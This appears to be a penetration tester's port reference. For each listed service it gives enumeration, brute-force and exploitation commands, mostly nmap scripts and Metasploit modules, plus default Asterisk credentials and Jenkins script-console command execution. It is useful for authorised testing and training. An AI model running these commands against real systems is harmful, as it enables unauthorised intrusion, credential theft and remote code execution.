
Authors: < nixawk >


Ports

Port Number Protocol Service & Application Commands
1 tcp blackice
7 tcp echo
11 tcp systat
13 tcp daytime
15 tcp netstat
17 tcp quote of the day
19 tcp character generator
21 tcp ftp
22 tcp ssh msf > use auxiliary/scanner/ssh/ssh_login
nmap --script ssh2-enum-algos 192.168.108.197
nmap --script ssh-hostkey 192.168.108.197
nmap --script sshv1 192.168.108.197
23 tcp telnet msf > use auxiliary/scanner/telnet/telnet_login
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s target
nmap -p 23 --script telnet-encryption target
nmap -p 23 --script telnet-ntlm-info target
25 tcp smtp nmap -p 25 --script smtp-brute target
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=domain] -pT:25,465,587 target
nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com target
nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=domain,smtp-open-relay.ip=address,...] -p 25,465,587 target
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 target
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 target
nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=domain' -pT:25,465,587 target
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 target
26 tcp ssh
37 tcp rdate
49 tcp TACACS+
53 tcp dns
53 udp dns
67 udp DHCP server (bootps)
68 udp DHCP client (bootpc)
69 udp TFTP,BitTorrent
70 tcp Gopher
79 tcp Finger
80 tcp HTTP,malware
81 tcp HTTP,malware
82 tcp HTTP,malware
83 tcp HTTP
84 tcp HTTP
88 tcp Kerberos use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
102 tcp Siemens S7
110 tcp pop3
111 tcp RPC rpcinfo -p 192.168.1.111
msf >use auxiliary/scanner/nfs/nfsmount
119 tcp NNTP
123 tcp NTP
123 udp ntp ntpdc -n -c monlist target (monlist is disabled in ntpd 4.2.7p26 and later; expect no answer from patched servers)
nmap -sU -p 123 -Pn -n --script ntp-info target
nmap -sU -p 123 -Pn -n --script ntp-monlist target
msf > use auxiliary/scanner/ntp/ntp_readvar
137 udp NetBIOS Name Service (NBNS) nbtscan -A target
143 tcp IMAP
161 udp snmp snmpcheck -p 161 -c public -t target
snmpwalk -v1 -c public target
msf > use auxiliary/scanner/snmp/snmp_enum
175 tcp IBM Network Job Entry
179 tcp BGP
195 tcp TA14-353a
311 tcp OS X Server Manager
389 tcp ldap ldap://target/dc=com
443 tcp https openssl s_client -connect www.yahoo.com:443
sslscan www.yahoo.com
tlssled www.yahoo.com 443
nmap --script sslv2 www.yahoo.com
nmap --script ssl-cert www.yahoo.com
nmap --script ssl-date www.yahoo.com
nmap --script ssl-enum-ciphers www.yahoo.com
nmap --script ssl-google-cert-catalog www.yahoo.com
msf > use auxiliary/pro/web_ssl_scan
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf > use auxiliary/server/openssl_heartbeat_client_memory
445 tcp Microsoft-DS Active Directory, Windows shares
Microsoft-DS SMB file sharing
smbclient -U root -L target
smbclient -U root //target/tmp
rpcclient -U "" target
msf > use auxiliary/admin/smb/samba_symlink_traversal
465 tcp smtps
500 udp ike
502 tcp modbus
503 tcp modbus
512 tcp exec (rexec)
513 tcp login (rlogin)
514 tcp shell (rsh); 514/udp is syslog
515 tcp Line Printer Daemon
520 tcp RIP
523 tcp IBM DB2
554 tcp RTSP
587 tcp SMTP mail submission
623 tcp IPMI
626 tcp OS X serialnumbered
631 tcp CUPS Service error
636 tcp ldaps
771 tcp Realport
789 tcp Redlion Crimson3
873 tcp rsync rsync -a user@host::tools/
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' target
nmap -p 873 --script rsync-list-modules target
msf >use auxiliary/scanner/rsync/modules_list
902 tcp VMware authentication
992 tcp Telnet(secure)
993 tcp IMAPs
995 tcp POP3s
1023 tcp telnet
1025 tcp Kamstrup
1099 tcp Remote Method invocation use exploit/multi/misc/java_rmi_server
1194 tcp openvpn
1200 tcp Codesys
1234 udp udpxy
1202 tcp linknat
1434 udp MS-SQL monitor
1604 Citrix, malware
1723 tcp pptp thc-pptp-bruter -v -u username -n 4 target < pass.txt
1741 CiscoWorks
1883 MQTT (8883 for MQTT over TLS)
1900 tcp bes,UPnP
1911 Niagara Fox
1962 PCworx
2000 iKettle,MikroTik bandwidth test
2049 tcp nfs showmount --all target
showmount --exports target
mount -t nfs target:/ /mnt/nfs/
2121 tcp ftp msf > use auxiliary/scanner/ftp/ftp_login
2082 tcp cpanel
2083 tcp cpanel
2086 WHM
2087 WHM
2123 GTPv1
2152 GTPv1
2182 Apache Zookeeper
2222 tcp SSH, PLC5, EtherNet/IP
2323 tcp telnet
2332 tcp Sierra wireless(telnet)
2375 Docker
2376 Docker
2404 IEC-104
2455 CoDeSys
2480 OrientDB
2628 Dictionary
3000 ntop
3128 tcp squid
3299 tcp sap msf > use auxiliary/scanner/sap/sap_router_portscanner
3306 tcp mysql msf > use auxiliary/scanner/mysql/mysql_login
nmap --script mysql-brute target
nmap --script mysql-databases target
nmap -p 3306 --script mysql-dump-hashes --script-args='username=username,password=password' target
nmap -p 3306 --script mysql-enum target
nmap -p 3306 --script mysql-users target
nmap -p 3306 --script mysql-query --script-args='query="query"[,username=username,password=password]' target
3310 tcp ClamAV
3386 GTPv1
3388 RDP
3389 RDP
3541 PBX GUI
3542 PBX GUI
3632 tcp distccd msf > use exploit/unix/misc/distcc_exec 
3689 DACP
3780 Metasploit
3787 Ventrilo
4022 udpxy
4369 tcp Erlang Port Mapper Daemon nmap -p 4369 --script epmd-info target
4440 tcp rundeck
4500 IKE NAT-T(VPN)
4567 Modem web interface
4070 VertX/Edge door controller
4800 Moxa NPort
4911 Niagara Fox with SSL
4949 Munin
5006 MELSEC-Q
5007 MELSEC-Q
5008 NetMobility
5009 Apple AirPort Administrator
5038 tcp Asterisk Call Manager http://code.google.com/p/sipvicious/

$ ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted
action: command
command: core show help
5432 tcp postgresql
5060 udp sip msf > use auxiliary/scanner/sip/options
5222 XMPP
5269 XMPP Server to Server
5353 mDNS
5357 Microsoft-HTTPAPI/2.0
5432 Postgresql
5555 tcp hp data protector msf > use exploit/windows/misc/hp_dataprotector_cmd_exec
5577 Flux LED
5601 tcp kibana
5632 PCAnywhere
5672 RabbitMQ
5900 tcp vnc msf > use auxiliary/scanner/vnc/vnc_none_auth
msf > use auxiliary/scanner/vnc/vnc_login
msf > use exploit/multi/vnc/vnc_keyboard_exec
nmap --script vnc-brute -p 5900 target
nmap --script vnc-info -p 5900 target
5901 vnc
5938 TeamViewer
5984 CouchDB
5985 tcp winrm msf >use exploit/windows/winrm/winrm_script_exec
msf >use auxiliary/scanner/winrm/winrm_auth_methods
msf >use auxiliary/scanner/winrm/winrm_cmd
msf >use auxiliary/scanner/winrm/winrm_login
msf >use auxiliary/scanner/winrm/winrm_wql
6000 tcp x11 xwd -root -screen -silent -display 192.168.1.108:0 > out.xwd
convert out.xwd out.png
6379 tcp redis redis-cli -h target -p 6379
msf >use auxiliary/scanner/redis/file_upload
msf >use auxiliary/scanner/redis/redis_login
msf > use auxiliary/scanner/redis/redis_server
6380 tcp redis
6082 tcp varnish
6667 tcp ircd backdoor msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
6881 BitTorrent
6969 TFTP,BitTorrent
7001 tcp weblogic
8080 tcp jenkins Jenkins Script Console (/script), Groovy example:
println "cmd.exe /c dir".execute().text

msf >use auxiliary/scanner/http/jenkins_enum
msf >use exploit/multi/http/jenkins_script_console
8083 tcp vestacp
8089 tcp jboss
8101 tcp apache karaf
8180 tcp apache tomcat msf > use exploit/multi/http/tomcat_mgr_deploy
8443 tcp https
8554 tcp rtsp
8649 tcp ganglia
9009 tcp Julia
9151 tcp Tor Control
9160 Apache Cassandra
9200 tcp elasticsearch msf >use exploit/multi/elasticsearch/search_groovy_script
9418 tcp git
10000 tcp virtualmin/webmin
11211 tcp memcache msf > use auxiliary/gather/memcached_extractor
$ nc x.x.x.x 11211
stats\r\n
13579 Media Player classic web interface
15672 tcp rabbitmq management HTTP login - default guest/guest (recent versions only accept the guest account from localhost)
17185 VxWorks WDBRPC
18083 tcp vbox server
27017 tcp mongodb msf >use auxiliary/scanner/mongodb/mongodb_login
$ mongo host:port/database
MongoDB shell version: 2.6.12
> help
28017 tcp mongodb
37777 Dahua DVR
44818 EtherNet/IP
49153 WeMo Link
50000 tcp sap
50030 tcp hadoop
50070 tcp hadoop
51106 Deluge(HTTP)
54138 Toshiba PoS
55553 Metasploit
55554 Metasploit
62078 Apple iDevice
64738 Mumble

Links

  1. http://www.rfc-editor.org/search/rfc_search.php
  2. http://packetlife.net/
  3. https://www.leanpub.com/shodan